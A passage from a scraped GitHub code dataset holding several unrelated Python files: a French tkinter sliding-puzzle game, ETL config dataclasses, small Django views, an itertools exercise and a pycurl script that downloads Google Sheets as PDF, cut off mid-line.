False:\r\n self.root.title(nom)\r\n elif top == True:\r\n self.top.title(nom)\r\n\r\n def screen_shot(self, nom, extension=\".png\"):\r\n \"\"\"\r\n effectue un screen shot\r\n :param nom:\r\n :return:\r\n \"\"\"\r\n PIL.ImageGrap.grab().sabe(nom + extension)\r\n\r\n def open_image(self, nom):\r\n \"\"\"\r\n\r\n :param nom: avec l'extension\r\n :return:\r\n \"\"\"\r\n photo = PhotoImage(file=nom)\r\n\r\n return photo\r\n\r\n def fond(self, couleur='0', methode=False, top=False, renvoie=False):\r\n\r\n \"\"\"\r\n change la couleur du fond\r\n inutile de lire cette fonction elle permet juste de gérer plein de chose pour l'ester egg\r\n :param couleur: la couleur souhaiter ou zero pour random\r\n :param methode: la methode utilisé dans couleur_random()\r\n :param top: si on veux modifier la couleur du top\r\n :return: nothing\r\n \"\"\"\r\n if not renvoie:\r\n if not top:\r\n if couleur != '0':\r\n self.root['bg'] = couleur\r\n elif methode != 0:\r\n self.root['bg'] = couleur_random(methode)\r\n else:\r\n try:\r\n self.root['bg'] = couleur\r\n except:\r\n print('erreur sur le changement de fond couleur')\r\n elif top:\r\n if couleur != '0':\r\n self.top['bg'] = couleur\r\n elif methode != 0:\r\n self.top['bg'] = couleur_random(methode)\r\n else:\r\n try:\r\n self.top['bg'] = couleur\r\n except:\r\n print('erreur sur le changement de fond couleur')\r\n else:\r\n self.couleur_bu = couleur_random(methode)\r\n\r\n def resolution(self, taille='1920x1080', top=False, mode='manuel'):\r\n \"\"\"\r\n change la resolution\r\n :param mode: manuel or auto\r\n :param taille: 1920x1080\r\n :param top: type bool\r\n :return: nothing\r\n si le mode est auto cela change la resolution automatiquement par rapport a la resolution de l'écran\r\n \"\"\"\r\n if mode == 'auto':\r\n x = self.root.winfo_screenwidth()\r\n y = self.root.winfo_screenheight()\r\n taille = str(x) + 'x' + str(y)\r\n if top == False:\r\n self.root.geometry(taille)\r\n else:\r\n self.top.geometry(taille)\r\n\r\n def actualisation(self):\r\n \"\"\"\r\n gere actualisation de la fenetre et s'auto appelle au bout de 50ms\r\n sert pour le moment au ester egg\r\n :return:\r\n \"\"\"\r\n if self.epi:\r\n self.fond(methode=4)\r\n self.fond(methode=3, renvoie=True)\r\n\r\n self.root.after(50, self.actualisation)\r\n\r\n def f_epi(self):\r\n \"\"\"\r\n ester egg sur le mode épileptique\r\n :return:\r\n \"\"\"\r\n\r\n self.epi = True\r\n self.actualisation()\r\n\r\n ##############################################################################################################################\r\n # %%spyderonly debut de la zone du Taquin\r\n ###############################################################################################################################\r\n\r\n def init_taquin(self):\r\n \"\"\"\r\n oui je pourais tous mettre dans le init mais pas soucis\r\n se simpliciter et modulatirer je prefere separer chaque initialisation\r\n \"\"\"\r\n self.root.iconbitmap('taquin.ico')\r\n self.couleur_bg = \"#404256\"\r\n self.couleur_fg = 'white'\r\n self.couleur_predefinis = False\r\n self.couleur_rond()\r\n self.police = Font(size=15, family='High Tower text') # normalement inclus avec office sinon mettez Times news roman\r\n self.afficher_nb_coup_var = False\r\n self.nb_coup_SV = StringVar() # SV sera string var\r\n self.inv_depla = False\r\n self.resolution(\"1000x800\")\r\n self.init_canevas()\r\n self.init_bouton()\r\n self.maj_taquin()\r\n\r\n def init_canevas(self):\r\n \"\"\"initalise le cannevas de jeu \"\"\"\r\n self.can = Canvas(self.root, width=500, height=500, bd=1, relief=SUNKEN, bg=self.bg)\r\n self.can.place(anchor=CENTER, relx=0.4, rely=0.4)\r\n\r\n self.root.bind('', self.clavier )# pour jouer avec zqsd ou les fleches du clavier\r\n\r\n def init_bouton(self):\r\n \"\"\"nos 100 000 bouton et label\"\"\"\r\n self.aide_nb_coup = Button(self.root, text=\"Nombre de coup\", bg=self.couleur_bg, fg=self.couleur_fg,\r\n font=self.police, width=15, height=2, command=self.afficher_nb_coup)\r\n self.aide_nb_coup.place(anchor=CENTER, relx=0.2, rely=0.85)\r\n self.label_nb_coup = Label(self.root, textvariable=self.nb_coup_SV, bg=self.couleur_bg, fg=self.couleur_fg, bd=2,\r\n font=self.police, width=17, height=2)\r\n self.aide_coup_s = Button(self.root, text=\"Coup suivant\", bg=self.couleur_bg, fg=self.couleur_fg, bd=2,\r\n font=self.police, width=15, height=2, command=self.coup_suivant)\r\n self.aide_coup_s.place(anchor=CENTER, relx=0.5, rely=0.85)\r\n self.aide_solu = Button(self.root, text=\"Solution\", bg=self.couleur_bg, fg=self.couleur_fg, bd=2,\r\n font=self.police, width=15, height=2, command=self.solution)\r\n self.aide_solu.place(anchor=CENTER, relx=0.8, rely=0.85)\r\n\r\n self.new_eazy = Button(self.root, text=\"Nouvelle partie\\n Difficulté simple \", bg=self.couleur_bg, fg=self.couleur_fg, bd=2,\r\n font=self.police, width=15, height=4, command=self.n_eazy_fu)\r\n self.new_eazy.place(anchor = CENTER, relx=0.8, rely=0.3)\r\n\r\n self.new_hard = Button(self.root, text=\"Nouvelle partie\\n Difficulté hard \", bg=self.couleur_bg,\r\n fg=self.couleur_fg, bd=2,\r\n font=self.police, width=15, height=4, command=self.n_hard_fu)\r\n self.new_hard.place(anchor=CENTER, relx=0.8, rely=0.55)\r\n\r\n Button(self.root, text=\"Couleur\\nRandom\", bg=self.couleur_bg,\r\n fg=self.couleur_fg, bd=2, width=6, height=3, command=self.couleur_rond_r).place(relx=0.85, rely=0.15, anchor = CENTER)\r\n Button(self.root, text=\"Couleur\\nSimple\", bg=self.couleur_bg,\r\n fg=self.couleur_fg, bd=2, width=6, height=3, command=self.couleur_rond_p).place(relx=0.75, rely=0.15, anchor = CENTER)\r\n Button(self.root, text=\"Regle du jeux\", bg=self.couleur_bg,\r\n fg=self.couleur_fg, bd=2, width=10, height=3, command=self.rule).place(relx=0.01, rely=0.01)\r\n Button(self.root, text=\"Inverser les touches\", bg=self.couleur_bg,\r\n fg=self.couleur_fg, bd=2, width=15, height=2, command=self.inverse_deplacement).place(relx=0.4, rely=0.04, anchor = CENTER)\r\n\r\n def rule(self):\r\n \"\"\" ouvre dans le navigateur index.html\"\"\"\r\n\r\n try:\r\n import webbrowser\r\n import psutil\r\n url = 'index.html'\r\n if psutil.LINUX:\r\n # Linux\r\n print('unix')\r\n chrome_path = '/usr/bin/google-chrome %s'\r\n webbrowser.get(chrome_path).open(url)\r\n elif psutil.WINDOWS:\r\n # Windows\r\n print('windows')\r\n try:\r\n os.startfile('index.html') # windows\r\n print('enfin')\r\n except:\r\n chrome_path = 'C:/Program Files/Google/Chrome/Application/chrome.exe %s'\r\n webbrowser.get(chrome_path).open(url)\r\n chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'#windows serveur et veille version\r\n webbrowser.get(chrome_path).open(url)\r\n\r\n elif psutil.MACOS:\r\n print('macos')\r\n # MacOS\r\n chrome_path = 'open -a /Applications/Google\\ Chrome.app %s'\r\n webbrowser.get(chrome_path).open(url)\r\n except:#google n'est pas installer\r\n try:\r\n os.startfile('index.html') # windows\r\n print('enfin')\r\n except:# lamenais (cmd bloque)\r\n print('#################################################\\n il faut lancer a la main le fichier index.html \\n #############################')\r\n\r\n\r\n def n_eazy_fu(self):\r\n \"\"\"\r\n cette fonction cree une nouvelle partie avec un melange dis simple\r\n le melange fais des coups aleatoire\r\n \"\"\"\r\n t.melanger()\r\n t.save_etat()\r\n print(t)\r\n if self.afficher_nb_coup_var: # pour masquer l'affichage du nombre de coup\r\n self.afficher_nb_coup()\r\n self.couleur_rond()\r\n self.maj_taquin()\r\n\r\n def n_hard_fu(self):\r\n \"\"\"\r\n cette fonction fais un melange chaotique\r\n \"\"\"\r\n t.melange2()\r\n t.unsave_etat(t.etat)\r\n print(t)\r\n if self.afficher_nb_coup_var: #pour masquer l'affichage du nombre de coup\r\n self.afficher_nb_coup()\r\n self.couleur_rond()\r\n self.maj_taquin()\r\n\r\n def afficher_nb_coup(self):\r\n \"\"\"savoir si on affiche ou cache le nombre de coup \"\"\"\r\n if not self.afficher_nb_coup_var:\r\n self.afficher_nb_coup_var = True\r\n self.label_nb_coup.place(anchor=CENTER, relx=0.2, rely=0.95)\r\n self.maj_nb_coup()\r\n else:\r\n self.afficher_nb_coup_var = False\r\n self.label_nb_coup.place_forget()\r\n\r\n def maj_nb_coup(self):\r\n \"\"\"mets a jour la viable (string var tk) qui affiche le nombre de coup restant\"\"\"\r\n t.save_etat()\r\n self.nb_coup_SV.set(nb_coup_restant(t.etat))\r\n\r\n\r\n def coup_suivant(self):\r\n \"\"\" les save_etats se font souvent par precaution\r\n unsave permet de mettre le taquin a la sauvegarde donée en parametre \"\"\"\r\n t.save_etat()\r\n c = ida(t.etat)\r\n t.unsave_etat(c[-1])\r\n self.maj_taquin()\r\n\r\n def solution(self):\r\n \"\"\"\r\n en tinker le sleep freeze la fenetre donc faut improviser\r\n \"\"\"\r\n self.chemin = ida(t.etat)\r\n self.chemin.reverse()# la liste est a l'envers\r\n self.root.after(200, self.solution_sleep)\r\n\r\n def solution_sleep(self):\r\n ''' pour avoir un affichage de la solution dynamique toute les 300ms'''\r\n if not self.chemin:\r\n return False\r\n t.unsave_etat(self.chemin[0])\r\n print(t)#j'aime bien avoir une console qui affiche plein de truc pour debuger ( vue que il y a un Interface c'est pas derangant)\r\n self.maj_taquin()\r\n self.chemin.pop(0)#0 car ca finis par la solution donc je fais comme avec une file\r\n self.root.after(300, self.solution_sleep)#300ms\r\n\r\n def inverse_deplacement(self):\r\n \"\"\"inverse les deplacement (on deplace en fonction de la case et non du zero)\"\"\"\r\n self.inv_depla = not self.inv_depla\r\n\r\n def maj_taquin(self):\r\n '''\r\n fonction qui mets a jour l'affichage du taquin\r\n elle est sale puisque elle supprime chaque element du taquin et le replace a ca nouvelle position\r\n on fais des boules (ronds) car c'est plus jolie\r\n '''\r\n self.sup_all()#vide le canevas (c'est sale)\r\n x = 100\r\n y = 100\r\n r = 70 # pour avoir un peu d'espace\r\n for i in t.liste_taquin:#pour une fois que j'utilise t.liste_taquin\r\n if i != \"0\":\r\n self.can.create_oval(x-r, y-r, x+r, y+r, fill=self.dico_couleur[int(i)], outline=self.dico_couleur[int(i)])\r\n self.can.create_text(x, y, text=i, fill='white', font=self.police_ttg, anchor=CENTER)\r\n else:\r\n self.can.create_oval(x-r, y-r, x+r, y+r, fill='#323445', outline='#1e1f29') # rond vide\r\n x += 150\r\n if x > 400:\r\n x = 100\r\n y += 150\r\n if t.est_gagnant():\r\n print('gggg')\r\n showinfo(\"Victoire\", \"Bien Joué\" , parent=self.can)# parent permet de faire apparaitre au dessus d'un element mais ca marche pas vraiment :)\r\n t.melanger()\r\n self.maj_taquin()\r\n\r\n def sup_all(self):\r\n \"\"\" cette fonction vide le canevas\r\n c'est sale mais fonctionel\"\"\"\r\n for i in self.can.find_all():#parcours tous les elements du canevas\r\n self.can.delete(i)\r\n\r\n def couleur_rond_r(self):\r\n \"\"\" r pour random cette fonction est appeler par le bouton\"\"\"\r\n self.couleur_predefinis = False\r\n self.couleur_rond()\r\n self.maj_taquin()\r\n\r\n def couleur_rond_p(self):\r\n \"\"\" p pour predefinis cette fonction est appeler par le bouton\"\"\"\r\n self.couleur_predefinis = True\r\n self.couleur_rond()\r\n self.maj_taquin()\r\n\r\n def couleur_rond(self):\r\n \"\"\" cette fonction choisis les couleur des ronds\r\n soit via des couleur predefinis soit via des couleur au hasard qui se base sur une fonction de fonction recurante \"\"\"\r\n self.dico_couleur = {}\r\n if self.couleur_predefinis:\r\n liste_couleur_predefinis = [\"#FF5500\", \"#FFAA00\", \"#AAFF00\", \"#55FF00\", \"#00FF00\", \"#00FF55\", \"#00FFAA\", \"#00FFFF\"]\r\n for i in range(1, 9):\r\n self.dico_couleur[i] = liste_couleur_predefinis.pop(randint(0, len(liste_couleur_predefinis)-1)) #pour prendre une couleur au hasard\r\n else:\r\n for i in range(9):\r\n self.dico_couleur[i] = couleur_random(methode = 6)\r\n\r\n def clavier(self, event):\r\n \"\"\" detecte les touches du clavier \"\"\"\r\n touche = event.keysym\r\n if not self.inv_depla:#si on deplace le zero\r\n if touche == \"Up\" or touche == \"z\":\r\n t.haut()\r\n elif touche == \"Down\" or touche == \"s\":\r\n t.bas()\r\n elif touche == \"Right\" or touche == \"d\":\r\n t.droite()\r\n elif touche == \"Left\" or touche == \"q\":\r\n t.gauche()\r\n else:#si on deplace pas le zero\r\n if touche == \"Up\" or touche == \"z\":\r\n t.bas()\r\n elif touche == \"Down\" or touche == \"s\":\r\n t.haut()\r\n elif touche == \"Right\" or touche == \"d\":\r\n t.gauche()\r\n elif touche == \"Left\" or touche == \"q\":\r\n t.droite()\r\n\r\n if self.afficher_nb_coup_var:# si on affiche le nombre de coup\r\n self.maj_nb_coup()\r\n print(t)# pour debuger\r\n self.maj_taquin()\r\n\r\n\r\n", "repo_name": "Rayandri/Slidding-puzzle-", "sub_path": "classe_tk.py", "file_name": "classe_tk.py", "file_ext": "py", "file_size_in_byte": 18284, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 23, "usage_type": "call"}, {"api_name": "psutil.LINUX", "line_number": 268, "usage_type": "attribute"}, {"api_name": "webbrowser.get", "line_number": 272, "usage_type": "call"}, {"api_name": "psutil.WINDOWS", "line_number": 273, "usage_type": "attribute"}, {"api_name": "os.startfile", "line_number": 277, "usage_type": "call"}, {"api_name": "webbrowser.get", "line_number": 281, "usage_type": "call"}, {"api_name": "webbrowser.get", "line_number": 283, "usage_type": "call"}, {"api_name": "psutil.MACOS", "line_number": 285, "usage_type": "attribute"}, {"api_name": "webbrowser.get", "line_number": 289, "usage_type": "call"}, {"api_name": "os.startfile", "line_number": 292, "usage_type": "call"}]} +{"seq_id": "42411657728", "text": "from dataclasses import dataclass, field\nfrom datetime import timedelta\nfrom numbers import Number\nfrom typing import Tuple, List, MutableMapping, Union\n\nfrom etl_engine.metastore import HWM, MetastoreABC, InMemoryMetastore, metastore_factory\n\n\n@dataclass\nclass SourceTarget:\n schema: str = field(default='')\n name: str = field(default='')\n location: str = field(default='')\n system: str = field(default='')\n columns: List[str] = field(default_factory=list)\n where: str = field(default='')\n hwm: Union[HWM, MutableMapping] = field(default_factory=dict)\n\n def __post_init__(self):\n if self.hwm and not isinstance(self.hwm, HWM):\n self.hwm = HWM.from_mapping(**self.hwm)\n\n @property\n def fqdn(self):\n return f'{self.schema}.{self.name}'.strip('.')\n\n def validate(self):\n if not (self.fqdn or self.location):\n raise ValueError('Provide (schema and name) or location.')\n return self\n\n\n@dataclass\nclass Strategy:\n name: str = field(default='')\n increment: Union[None, Number, timedelta, str] = field(default=None)\n\n def __post_init__(self):\n if isinstance(self.increment, str):\n key, value = self.increment.split('=')\n self.increment = timedelta(**{key: value})\n\n\n@dataclass\nclass ETL:\n source: Union[SourceTarget, MutableMapping] = field(default_factory=SourceTarget)\n target: Union[SourceTarget, MutableMapping] = field(default_factory=SourceTarget)\n strategy: Union[Strategy, MutableMapping] = field(default_factory=Strategy)\n\n def __post_init__(self):\n if not isinstance(self.source, SourceTarget):\n self.source = SourceTarget(**self.source)\n if not isinstance(self.target, SourceTarget):\n self.target = SourceTarget(**self.target)\n if not isinstance(self.strategy, Strategy):\n self.strategy = Strategy(**self.strategy)\n\n def validate(self):\n self.source.validate()\n self.target.validate()\n return self\n\n\n@dataclass\nclass SparkWrite:\n mode: str = field(default=None)\n partitionBy: str = field(default=None)\n format: str = field(default=None)\n options: MutableMapping[str, str] = field(default_factory=dict)\n\n\n@dataclass\nclass SparkRead:\n format: str = field(default=None)\n options: MutableMapping[str, str] = field(default_factory=dict)\n\n\n@dataclass\nclass Spark:\n conf: List[Tuple[str, str]] = field(default_factory=list)\n read: Union[SparkRead, MutableMapping] = field(default_factory=dict)\n write: Union[SparkWrite, MutableMapping] = field(default_factory=dict)\n\n def __post_init__(self):\n if self.conf:\n self.conf = [tuple(k_v) for k_v in self.conf]\n if not isinstance(self.write, SparkWrite):\n self.write = SparkWrite(**self.write)\n if not isinstance(self.read, SparkRead):\n self.read = SparkRead(**self.read)\n\n\n@dataclass\nclass ETLConf:\n spark: Union[Spark, MutableMapping] = field(default_factory=Spark)\n etl: Union[ETL, MutableMapping] = field(default_factory=ETL)\n metastore: Union[MetastoreABC, MutableMapping] = field(default_factory=InMemoryMetastore)\n\n def __post_init__(self):\n if not isinstance(self.spark, Spark):\n self.spark = Spark(**self.spark)\n if not isinstance(self.etl, ETL):\n self.etl = ETL(**self.etl)\n if not isinstance(self.metastore, MetastoreABC):\n self.metastore = metastore_factory(self.metastore)\n\n def validate(self):\n self.etl.validate()\n return self\n\n @classmethod\n def from_yaml(cls):\n ... # TODO\n\n @classmethod\n def from_mapping(cls, data: MutableMapping):\n return cls(**data)\n", "repo_name": "jjj4x/etl-engine", "sub_path": "src/etl_engine/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 3717, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dataclasses.field", "line_number": 11, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 12, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 13, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 15, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 15, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 16, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 17, "usage_type": "name"}, {"api_name": "etl_engine.metastore.HWM", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 17, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 17, "usage_type": "call"}, {"api_name": "etl_engine.metastore.HWM", "line_number": 20, "usage_type": "argument"}, {"api_name": "etl_engine.metastore.HWM.from_mapping", "line_number": 21, "usage_type": "call"}, {"api_name": "etl_engine.metastore.HWM", "line_number": 21, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 9, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 35, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 36, "usage_type": "name"}, {"api_name": "numbers.Number", "line_number": 36, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 36, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 41, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 33, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 46, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 46, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 47, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 47, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 48, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 48, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 44, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 66, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 67, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 68, "usage_type": "call"}, {"api_name": "typing.MutableMapping", "line_number": 69, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 69, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 64, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 74, "usage_type": "call"}, {"api_name": "typing.MutableMapping", "line_number": 75, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 75, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 72, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 80, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 80, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 81, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 81, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 81, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 82, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 82, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 78, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 95, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 95, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 96, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 96, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 96, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 97, "usage_type": "name"}, {"api_name": "etl_engine.metastore.MetastoreABC", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 97, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 97, "usage_type": "call"}, {"api_name": "etl_engine.metastore.InMemoryMetastore", "line_number": 97, "usage_type": "name"}, {"api_name": "etl_engine.metastore.MetastoreABC", "line_number": 104, "usage_type": "argument"}, {"api_name": "etl_engine.metastore.metastore_factory", "line_number": 105, "usage_type": "call"}, {"api_name": "typing.MutableMapping", "line_number": 116, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "34900844081", "text": "from django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse\nimport json\nfrom users.models import Token\nfrom uuid import uuid4\nimport requests\nfrom django.conf import settings\n\n#------function---------------\n\ndef set_endpoint(username,endpoint):\n settings.CACHE.lset(username+'_user', 0,endpoint) \n print(\"save endpoint\")\n\ndef set_translate_api(username,ans):\n settings.CACHE.lset(username+'_user', 2,ans) \n print(\"save...\")\n\n#----------------------------\n\n@csrf_exempt\ndef sandept(request):\n # Type : request -> Json \n \"\"\"\n \n \"\"\"\n endpoint = request.POST.get('endpoint', None)\n context = {\"result\":endpoint}\n username = request.user.username\n set_endpoint(username,endpoint[1:-1])\n return HttpResponse(json.dumps(context))\n\n@csrf_exempt\ndef crt_token(request):\n token = int(request.POST.get('token', None))\n context = {\"result\":token}\n for i in range(token):\n rand_token = uuid4()\n db = Token(token=rand_token, username='')\n db.save()\n return HttpResponse(json.dumps(context))\n\n@csrf_exempt\ndef translept(request):\n endpoint = request.POST.get('endpoint', None)\n endpoint = endpoint[1:-1]\n username = request.user.username\n print(endpoint)\n # endpoint = \"https://h1e54y0sel.execute-api.us-east-1.amazonaws.com/dev/translate-text\"\n payload = {'API_Endpoint': endpoint}\n result=\"Your API is timeout. Pleas try again\"\n try:\n req = requests.request('POST', 'https://h1e54y0sel.execute-api.us-east-1.amazonaws.com/dev/translate-api',json=payload,timeout=15)\n result = req.json()[\"body\"]\n except:\n pass\n if(result==\"Your API is working perfectly.\"):\n set_translate_api(username,\"true\")\n else:\n set_translate_api(username,\"false\")\n context = {\"result\":result}\n return HttpResponse(json.dumps(context))", "repo_name": "Hank-Kuo/client_server_flow_test", "sub_path": "sandbag/app/views_ajax.py", "file_name": "views_ajax.py", "file_ext": "py", "file_size_in_byte": 1870, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.conf.settings.CACHE.lset", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.settings.CACHE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 12, "usage_type": "name"}, {"api_name": "django.conf.settings.CACHE.lset", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.settings.CACHE", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 16, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 31, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 31, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 21, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 38, "usage_type": "call"}, {"api_name": "users.models.Token", "line_number": 39, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 41, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 41, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 33, "usage_type": "name"}, {"api_name": "requests.request", "line_number": 53, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 62, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 62, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 43, "usage_type": "name"}]} +{"seq_id": "1759040713", "text": "from django.shortcuts import render\nfrom django.db import connection\n\n# Create your views here.\n# Create your views here.\nresponse={}\ndef index(request):\n\tcur = connection.cursor()\t\t\n\t#cur.execute('SET SEARCH_PATH to SION;')\n\tcur.execute('SELECT * FROM ORGANISASI O JOIN TUJUAN_ORGANISASI TU ON O.email_organisasi = TU.organisasi ')\n\t\n\tresponse={\n\t\t'role':request.session['role'],\n 'relawan':'relawan',\n 'sponsor':'sponsor',\n 'donatur':'donatur',\n\t\t'pengurus':'pengurus'\n\t}\n\tresponse['organisasi'] = dictfetchall(cur)\n\tcur.execute(' SELECT po.EMAIL, po.ORGANISASI FROM PENGURUS_ORGANISASI po, ORGANISASI o WHERE o.email_organisasi = po.organisasi')\n\tresponse['pengurus_org']=dictfetchall(cur)\n\n\tcur.execute(' SELECT d.donatur, d.organisasi FROM DONATUR_ORGANISASI d, ORGANISASI o WHERE o.email_organisasi = d.organisasi')\n\tresponse['donatur_org']=dictfetchall(cur)\n\n\tcur.execute('SELECT s.sponsor, s.organisasi FROM SPONSOR_ORGANISASI s, ORGANISASI o WHERE o.email_organisasi = s.organisasi')\n\tresponse['sponsor_org']=dictfetchall(cur)\n\n\tcur.execute('SELECT s.organisasi, SUM(s.nominal) FROM SPONSOR_ORGANISASI s, ORGANISASI o WHERE o.email_organisasi = s.organisasi GROUP BY organisasi')\n\tresponse['donasi_sponsor']=dictfetchall(cur)\n\n\tprint(response['donasi_sponsor'])\n\thtml='profil_organisasi/profil_organisasi.html'\n\treturn render(request, html, response)\n\n\ndef dictfetchall(cursor):\n \n\tcolumns = [col[0] for col in cursor.description]\n\treturn [\n\t\tdict(zip(columns, row))\n\t\tfor row in cursor.fetchall()\n\t]\n\n\n#SELECT organisasi, SUM(nominal)\n#FROM DONATUR_ORGANISASI\n#GROUP BY organisasi\n\n#SELECT EMAIL\n##FROM PENGURUS_ORGANISASI po, ORGANISASI o\n#WHERE o.email_organisasi = po.organisasi;\n\n\n\n\t\n\n\n\n", "repo_name": "roomay04/SION", "sub_path": "profil_organisasi/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1723, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.connection.cursor", "line_number": 8, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 8, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "14895792896", "text": "import itertools\ndef solution(number, k):\n answer = ''\n length=len(number)-k\n temp=[]\n for comb in itertools.combinations(range(len(number)),k):\n number2=number\n for i in comb:\n number2=number2.replace(number[i],\"\",1)\n temp.append(number2)\n return max(temp)", "repo_name": "HongDaeYong/codingStudy", "sub_path": "ayun/6_greedy/2_큰수만들기.py", "file_name": "2_큰수만들기.py", "file_ext": "py", "file_size_in_byte": 304, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "itertools.combinations", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "74610402724", "text": "import pycurl\nfrom io import BytesIO \nimport certifi\nimport PIL\nimport sys\nimport os\nimport json\nimport re\n\n\nOPTS = (\"/export?format=pdf&portrait=false\" +\n \"&size=A4\" + \n \"&top_margin=0.00\" + \n \"&bottom_margin=0.00\" +\n \"&left_margin=0.00\" +\n \"&right_margin=0.00\" +\n \"&scale=4\")\ndef downloadFile(output, spreadsheetID, sheetID=0):\n if str(int(sheetID)) != str(sheetID):\n raise ValueError(\"Invalid sheet ID\")\n if not re.match(r'^\\w+$', spreadsheetID):\n raise ValueError(\"Invalid spreadsheet ID\")\n\n print (\"Downloading sheet...\")\n url = (\"https://docs.google.com/spreadsheets/d/\" + spreadsheetID + \n OPTS + \"&gid=\" + str(sheetID)) \n print(url)\n with open(output, 'wb') as file: \n crl = pycurl.Curl() \n crl.setopt(crl.CAINFO,certifi.where())\n # Set URL value\n crl.setopt(crl.URL, url) \n crl.setopt(crl.FOLLOWLOCATION, True)\n # Write bytes that are utf-8 encoded\n crl.setopt(crl.WRITEDATA, file)\n\n # Perform a file transfer \n crl.perform() \n\n # End curl session\n crl.close()\n\n\n\nfrom pdf2image import convert_from_path, convert_from_bytes\n\nfrom pdf2image.exceptions import (\n PDFInfoNotInstalledError,\n PDFPageCountError,\n PDFSyntaxError\n)\n\n#path of pdf, cropRect is percentage of rectangle.\n#e.g. [0.1, 0.2, 0.5, 0.7] will crop the left 10%, right 50%, top 20% and bottom 30%\ndef convertPdf(path, name, cropRect):\n print (\"Opening \" + path)\n filename = 